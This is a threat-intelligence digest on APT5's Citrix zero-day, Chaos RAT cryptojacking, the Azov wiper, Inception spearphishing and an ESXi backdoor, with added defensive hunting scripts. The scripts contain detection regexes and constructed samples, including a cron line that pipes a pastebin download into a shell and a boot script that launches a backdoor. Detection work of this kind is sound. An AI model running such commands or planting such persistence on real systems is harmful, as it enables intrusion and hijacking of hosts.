Anomali Cyber Watch: APT5 Exploited Citrix Zero-Days, Azov Data Wiper Features Advanced Anti-Analysis Techniques, Inception APT Targets Russia-Controlled Territories, and More
The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Backdoors, Belarus, China, Data wiping, Russia, Ukraine and Zero-days. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
APT5: Citrix ADC Threat Hunting Guidance
(published: December 13, 2022)
On December 13, 2022, the US National Security Agency (NSA) published threat hunting guidance on ongoing exploitation of Citrix products. Citrix confirmed that the critical remote code execution vulnerability (CVE-2022-27518, Citrix advisory CTX474995) affects Citrix Application Delivery Controller (Citrix ADC) and Citrix Gateway 13.0 before 13.0-58.32 and 12.1 before 12.1-65.25 (the 12.1 FIPS and NDcPP builds have their own fixed versions); the flaw is reachable only when the appliance is configured as a SAML service provider or SAML identity provider, and version 13.1 is not affected. Active exploitation of CVE-2022-27518 as a zero-day was attributed to China-sponsored APT5 (Keyhole Panda, Manganese, UNC2630) and its custom Tricklancer malware.
Analyst Comment: All customers on affected builds should move to a fixed build immediately, or upgrade to 13.1, which is not affected. The Anomali Platform carries YARA signatures for the Tricklancer malware; network defenders are also encouraged to follow the additional hunting suggestions in the NSA guidance: compare hashes of the key executables of the Citrix ADC appliance against known-good values, and analyze off-device logs for gaps and mismatches, unauthorized modification of user permissions, unauthorized changes to the crontab, and other known signs of APT5 activity. A compromised appliance cannot be trusted to report on itself, so rely on logs already forwarded to an external collector and on hashes computed from a trusted copy of the same build.
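The three hunting checks in the comment above, worked through as an added example (this is not NSA or Anomali code): hash drift of key appliance binaries against a known-good baseline, gaps in an off-device log export, and log evidence of system-user changes and crontab edits. The file paths, "known-good" bytes and log lines are constructed, and the ns.log `CMD_EXECUTED` and Vixie-cron `REPLACE` line shapes are assumptions to be checked against your own exports; take the real list of executables and hashes from the NSA guidance.

```python
"""Off-device hunting helpers for the Citrix ADC checks above.
Added example, not code from NSA or Anomali. Baseline bytes, paths and log
lines are constructed; the log line formats are assumptions."""
import hashlib
import re
from datetime import datetime, timedelta

# --- 1. Integrity of key appliance binaries against a known-good baseline ---
# Constructed "known-good" bytes stand in for a trusted copy of the same build;
# the paths are illustrative, not a vetted list.
KNOWN_GOOD = {
    "/netscaler/nsppe": b"\x7fELF known-good nsppe (constructed)",
    "/netscaler/nsaaad": b"\x7fELF known-good nsaaad (constructed)",
}
BASELINE = {p: hashlib.sha256(b).hexdigest() for p, b in KNOWN_GOOD.items()}

def integrity_drift(baseline, observed):
    """Return [(path, expected, actual)] for files whose hash differs or that
    are missing (actual is None). `observed` maps path -> bytes read from the box."""
    drift = []
    for path, expected in baseline.items():
        data = observed.get(path)
        actual = hashlib.sha256(data).hexdigest() if data is not None else None
        if actual != expected:
            drift.append((path, expected, actual))
    return drift

# --- 2. Gaps in a log stream that should be continuous ---
SYSLOG_TS = re.compile(r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<t>\d\d:\d\d:\d\d) ")

def parse_ts(line, year):
    """Syslog timestamps carry no year, so the caller supplies it."""
    m = SYSLOG_TS.match(line)
    if not m:
        return None
    return datetime.strptime(f"{year} {m['mon']} {m['day']} {m['t']}", "%Y %b %d %H:%M:%S")

def log_gaps(lines, year, max_gap=timedelta(minutes=5)):
    """Return [(before, after, seconds)] wherever consecutive entries are further
    apart than max_gap. Tune max_gap to the log's normal cadence; a gap is a lead
    (log deletion or forwarding outage), not proof of compromise on its own."""
    gaps, prev = [], None
    for line in lines:
        ts = parse_ts(line, year)
        if ts is None:
            continue
        if prev is not None and ts - prev > max_gap:
            gaps.append((prev, ts, int((ts - prev).total_seconds())))
        prev = ts
    return gaps

# --- 3. System-user changes and crontab edits ---
# Assumed shapes: ADC command audit lines carry CMD_EXECUTED and Command "...";
# Vixie-style cron logs a crontab edit as "(user) REPLACE (user)".
USER_CMD = re.compile(r'CMD_EXECUTED.*Command "((?:add|set|rm|bind) system user[^"]*)"')
CRON_EDIT = re.compile(r"crontab\[\d+\]: \((\w+)\) REPLACE \((\w+)\)")

def suspicious_admin_events(lines):
    """Return [(kind, detail)] for user-management commands and crontab replacements."""
    hits = []
    for line in lines:
        m = USER_CMD.search(line)
        if m:
            hits.append(("system-user-change", m.group(1)))
        m = CRON_EDIT.search(line)
        if m:
            hits.append(("crontab-replaced", f"{m.group(1)}->{m.group(2)}"))
    return hits

# Constructed sample export (not real appliance output).
SAMPLE_LOG = [
    'Dec 10 02:00:00 ns0 ns: default GUI CMD_EXECUTED 41 0 : User nsroot - Command "show ns version" - Status "Success"',
    'Dec 10 02:01:00 ns0 ns: default GUI CMD_EXECUTED 42 0 : User nsroot - Command "add system user svc_backup x" - Status "Success"',
    "Dec 10 02:01:30 ns0 crontab[9123]: (root) REPLACE (root)",
    'Dec 10 03:15:00 ns0 ns: default GUI CMD_EXECUTED 43 0 : User nsroot - Command "show ns info" - Status "Success"',
]

if __name__ == "__main__":
    observed = dict(KNOWN_GOOD)
    observed["/netscaler/nsppe"] = b"\x7fELF tampered (constructed)"
    print("drift:", integrity_drift(BASELINE, observed))
    print("gaps:", log_gaps(SAMPLE_LOG, 2022))
    print("events:", suspicious_admin_events(SAMPLE_LOG))
```

On the sample data the script reports one drifted binary, one 73-minute gap, one `add system user` command and one crontab replacement. In practice the baseline hashes must come from a clean appliance or image of the identical build, since any hash list read from the suspect device could itself have been altered.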
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application – T1190
Tags: actor:APT5, actor:UNC2630, actor:Manganese, actor:Keyhole Panda, CVE-2022-27518, CTX474995, Citrix ADC, Citrix Gateway, Zero-day, China, source-country:CN
Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT
(published: December 12, 2022)
In November 2022, Trend Micro researchers detected a new cryptojacking campaign. Unlike previously-recorded campaigns, which only installed cryptomining software, this one also deploys a remote access trojan (RAT): a Linux-targeting build of the open-source, Go-based Chaos RAT, which can download additional files, run a reverse shell, and take screenshots.
Analyst Comment: Patch and update exposed systems promptly. Monitor for sudden increases in resource utilization, track newly opened listening ports, and check for unexpected use of, or changes to, DNS routing and resolver configuration.
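An added example (not Trend Micro's or Anomali's code) of the host-level checks suggested above: listening ports that were absent from a baseline snapshot, cron entries that fetch remote content and pipe it into a shell or pull from a paste site, and nameservers that were not in the baseline resolv.conf. The snapshots are constructed, and the `ss -tlnp`, `crontab -l` and resolv.conf layouts are assumptions to verify against your own hosts.

```python
"""Host checks for the cryptojacking / Chaos RAT indicators above.
Added example, not Trend Micro's or Anomali's code. All snapshots are
constructed; the command output layouts are assumptions."""
import re

# One `ss -tlnp` row: State Recv-Q Send-Q Local Peer [Process]
SS_LINE = re.compile(r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s*(?P<proc>.*)$")

def listening_ports(ss_output):
    """Map 'addr:port' -> process column from `ss -tlnp` text (header skipped)."""
    ports = {}
    for line in ss_output.strip().splitlines()[1:]:
        m = SS_LINE.match(line.strip())
        if m and m["state"] == "LISTEN":
            ports[m["local"]] = m["proc"]
    return ports

def new_listeners(baseline_ss, current_ss):
    """Listeners present now that the baseline snapshot did not have."""
    base = listening_ports(baseline_ss)
    return {k: v for k, v in listening_ports(current_ss).items() if k not in base}

# A download piped straight into a shell, or any fetch from pastebin.com.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|da)?sh\b|\b(curl|wget)\b.*pastebin\.com")

def risky_cron_entries(crontab_text):
    """Non-comment cron lines that match FETCH_EXEC."""
    return [l.strip() for l in crontab_text.splitlines()
            if l.strip() and not l.strip().startswith("#") and FETCH_EXEC.search(l)]

def resolver_changes(baseline_conf, current_conf):
    """Nameservers in the current resolv.conf that the baseline lacked."""
    def servers(text):
        return {parts[1] for parts in (l.split() for l in text.splitlines())
                if len(parts) > 1 and parts[0] == "nameserver"}
    return sorted(servers(current_conf) - servers(baseline_conf))

def host_report(base_ss, cur_ss, cron, base_resolv, cur_resolv):
    """Bundle the three checks into one dict for a host."""
    return {"new_listeners": new_listeners(base_ss, cur_ss),
            "risky_cron": risky_cron_entries(cron),
            "new_nameservers": resolver_changes(base_resolv, cur_resolv)}

# Constructed snapshots (not real host output; process and paste IDs are placeholders).
BASE_SS = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22        0.0.0.0:*         users:(("sshd",pid=812,fd=3))
"""
CUR_SS = BASE_SS + 'LISTEN 0      4096   *:8080            *:*               users:(("sysupdate",pid=4471,fd=7))\n'
BASE_CRON = "0 3 * * * /usr/local/bin/backup.sh\n"
CUR_CRON = BASE_CRON + "*/10 * * * * curl -fsSL http://pastebin.com/raw/XXXXXXXX | sh\n"
BASE_RESOLV = "nameserver 10.0.0.53\n"
CUR_RESOLV = "nameserver 8.8.8.8\nnameserver 10.0.0.53\n"

if __name__ == "__main__":
    print(host_report(BASE_SS, CUR_SS, CUR_CRON, BASE_RESOLV, CUR_RESOLV))
```

Baselines should be captured at build time and stored off the host; comparing a snapshot against a baseline taken after infection only hides the change. Sustained CPU usage by an unfamiliar process is the remaining indicator from the comment and is best covered by your existing host monitoring rather than a one-off script.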
MITRE ATT&CK: [MITRE ATT&CK] External Remote Services – T1133 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] Screen Capture – T1113 | [MITRE ATT&CK] Remote Access Tools – T1219 | [MITRE ATT&CK] Exfiltration Over C2 Channel – T1041 | [MITRE ATT&CK] Resource Hijacking – T1496 | [MITRE ATT&CK] Exploit Public-Facing Application – T1190 | [MITRE ATT&CK] Account Discovery – T1087 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] System Shutdown/Reboot – T1529 | [MITRE ATT&CK] Application Layer Protocol – T1071 | [MITRE ATT&CK] Endpoint Denial of Service – T1499 | [MITRE ATT&CK] Data Manipulation – T1565
Tags: detection:CHAOS, detection:Trojan.Linux.CHAOSRAT, malware-type:RAT, Cryptomining, Cryptojacking, Cryptocurrency, XMRig, Monero, malware-type:Miner, Russia, Bulletproof hosting, Pastebin, JSON Web Token, Golang, Linux
Pulling the Curtains on Azov Ransomware: Not a Skidsware but Polymorphic Wiper
(published: December 12, 2022)
Azov data wiper (self-named "Azov Ransomware") was first detected in October 2022. Check Point researchers found over 17,000 malicious binaries related to Azov; many binaries can stem from a single infection, because the wiper backdoors other executables on the host with polymorphically encoded shellcode. Despite fake ransom notes that look unsophisticated, the researchers found several advanced techniques in Azov: manually crafted assembly, payload injection into existing executables to backdoor them, and multiple anti-analysis techniques, including junk code, opaque constants, opaque predicates, prevention of software breakpoints, syntactic confusion and bloat, and a volatile, homebrew import table for resolving Windows API routines at runtime.
Analyst Comment: Azov is distributed by the SmokeLoader botnet, typically bundled with cracked software, and SmokeLoader infections often also deliver credential-stealing malware, an additional concern for victims already facing the unrecoverable destruction caused by Azov. As long as individuals continue to download cracked software, threat actors will continue to use it as a distribution method; restrict such downloads in your organization and provide employees with legitimate software that is maintained and receives security patches. Researchers should also be aware of false-flag operations such as Azov, whose original fake ransom note planted Ukrainian and Polish references.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction – T1485 | [MITRE ATT&CK] Ingress Tool Transfer – T1105 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Virtualization/Sandbox Evasion – T1497
Tags: detection:Azov, malware-type:Wiper, Volatile Homebrew IAT, Call-return abuse, Opaque predicates, Opaque constants, Syntactic confusion, Ukraine, Pirated software, detection:Smokeloader, malware-type:Loader, False flag, Windows
Cloud Atlas Targets Entities in Russia and Belarus Amid the Ongoing War in Ukraine
(published: December 9, 2022)
The Inception (Cloud Atlas) cyberespionage group has been active in its current form since at least 2014 and was likely preceded by the Red October activity of 2007-2013. In December 2022, Check Point and Positive Technologies researchers independently profiled a new Inception campaign targeting Russia, Belarus, and Russian-occupied areas of Ukraine and Moldova. The group continues to use spearphishing to deliver its custom PowerShell-based backdoor, PowerShower. PowerShower in turn delivers the newly documented RtcpProxy tool, a Windows DLL that turns the infected host into a relay for Inception's worldwide proxy network.
Analyst Comment: With the escalation of military action between Russia and Ukraine, all involved sides remain heavily targeted by various cyberespionage groups. Spearphishing remains the preferred initial access technique for Inception and for a number of the other groups involved.
MITRE ATT&CK: [MITRE ATT&CK] Proxy – T1090 | [MITRE ATT&CK] Phishing – T1566 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Inter-Process Communication – T1559 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Exploitation for Client Execution – T1203 | [MITRE ATT&CK] Boot or Logon Autostart Execution – T1547 | [MITRE ATT&CK] Template Injection – T1221 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Data from Removable Media – T1025 | [MITRE ATT&CK] Data from Network Shared Drive – T1039 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Archive Collected Data – T1560 | [MITRE ATT&CK] Automated Collection – T1119 | [MITRE ATT&CK] Encrypted Channel – T1573 | [MITRE ATT&CK] Exfiltration Over C2 Channel – T1041 | [MITRE ATT&CK] Web Service – T1102
Tags: mitre-group:Inception, actor:Cloud Atlas, detection:PowerShower, PowerShell, Spearphishing, Russia, target-country:RU, Belarus, target-country:BY, target-region:Transnistria, target-region:Crimea, target-region:Luhansk, target-region:Donetsk, target-industry:Government, target-industry:Diplomatic, target-industry:Energy, target-industry:Technology, malware-type:Proxy, detection:RtcpProxy, file-type:DLL, VBS, file-type:HTA, file-type:LNK, OpenDrive, Windows
A Custom Python Backdoor for VMware ESXi Servers
(published: December 9, 2022)
Juniper researchers detected a new Python backdoor that appears to be tailored to VMware ESXi servers. The attack probably (medium confidence) begins with exploitation of a vulnerability in ESXi's OpenSLP service (CVE-2019-5544 or CVE-2020-3992). The Python backdoor is saved to a persistent datastore location, while three ESXi system files are modified in the in-memory filesystem, where ESXi would normally restore them on reboot, so the modifications are reapplied after each reboot. The malware launches a reverse shell and a reverse proxy and allows password-protected remote access.
Analyst Comment: Network defenders should check their ESXi instances. /etc/rc.local.d/local.sh should not contain unauthorized commands, and /store/packages/vmtools.py is likely a malicious addition masquerading through its name and a VMware-mimicking copyright statement in its code. Keep your VMware systems up to date with security patches.
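An added example (not Juniper's or VMware's code) of the two ESXi checks above, written to run against copies of the files rather than on the host: it lists every line of /etc/rc.local.d/local.sh that would actually execute something, flags Python files under /store/packages and whether they carry a VMware-looking copyright banner, and cross-references the two, since a flagged file that local.sh also launches at boot is the strongest signal. The file contents are constructed; the assumption that a stock local.sh holds only comments, blank lines and `exit 0`, and the banner regex, should be verified against a known-clean host of your ESXi version.

```python
"""Checks for the ESXi backdoor indicators above: executable lines in
/etc/rc.local.d/local.sh and unexpected Python files under /store/packages.
Added example, not Juniper's or VMware's code. File contents are constructed;
the stock-local.sh shape and the banner marker are assumptions."""
import re

# A stock local.sh: shebang, comments, blank lines and a trailing "exit 0".
STOCK_LINE = re.compile(r"^\s*(#.*|exit 0)?\s*$")

def unexpected_local_sh_lines(content):
    """(lineno, text) for every line that would actually execute something."""
    return [(n, line.rstrip())
            for n, line in enumerate(content.splitlines(), 1)
            if not STOCK_LINE.match(line)]

VMWARE_BANNER = re.compile(r"copyright.*vmware", re.I)   # assumed masquerade marker

def suspicious_store_packages(files):
    """files: {path: content}. Flag .py files under /store/packages and note
    whether each carries a VMware-looking copyright banner."""
    return [(p, bool(VMWARE_BANNER.search(c)))
            for p, c in files.items()
            if p.startswith("/store/packages/") and p.endswith(".py")]

def audit_esxi(local_sh, files):
    """Run both checks and report which flagged files local.sh launches at boot."""
    lines = unexpected_local_sh_lines(local_sh)
    pkgs = suspicious_store_packages(files)
    launched = [p for p, _ in pkgs if any(p in text for _, text in lines)]
    return {"local_sh": lines, "store_packages": pkgs, "launched_at_boot": launched}

# Constructed samples (not real ESXi files).
STOCK_LOCAL_SH = ("#!/bin/sh\n\n# local configuration options\n"
                  "# Note: modify at your own risk!\n\nexit 0\n")
TAMPERED_LOCAL_SH = STOCK_LOCAL_SH.replace(
    "exit 0", "/bin/nohup /bin/python /store/packages/vmtools.py >/dev/null 2>&1 &\nexit 0")
FILES = {
    "/store/packages/vmtools.py": "# Copyright (c) VMware, Inc. All rights reserved.\nimport socket\n",
    "/store/packages/readme.txt": "notes",
}

if __name__ == "__main__":
    print(audit_esxi(STOCK_LOCAL_SH, {}))
    print(audit_esxi(TAMPERED_LOCAL_SH, FILES))
```

Run it on files copied off the host (for example from a backup of the ESXi state) rather than trusting tooling on a suspect hypervisor. Note that ESXi's own local.sh header states the script is not run when UEFI Secure Boot is enabled, so enabling Secure Boot removes this particular persistence path.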
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application – T1190 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Proxy – T1090
Tags: ESXi, Python, malware-type:Backdoor, port:8307, port:427, Reverse shell, Reverse proxy, OpenSLP, VMware, CVE-2019-5544, CVE-2020-3992, file-type:PY, file-type:SH